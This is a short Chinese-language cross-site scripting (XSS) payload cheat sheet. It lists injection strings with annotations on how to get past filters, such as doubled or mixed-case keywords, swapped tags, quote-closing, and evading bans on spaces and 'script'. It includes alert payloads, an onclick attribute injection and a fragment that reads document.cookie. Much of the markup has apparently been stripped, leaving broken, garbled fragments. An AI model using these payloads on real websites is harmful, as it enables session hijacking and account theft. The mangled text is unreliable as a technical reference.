XSS payload (大集合)



(代替被转义的“”)
'>

1;rt('XSS')>(Ascii)
ript>alert(/xss/)双写绕过
混淆大小写绕过

更换标签
>"闭合
">

';document.title%3D54540//
lx=1'));alert(10558)//
'/>
'/> cookie='+document.cookie; 1" οnclick=alert(1)//      -用于镶嵌在input标签
      -当空格和script等敏感字符被过滤后绕过检测

   -当空格和script等敏感字符被过滤后绕过检测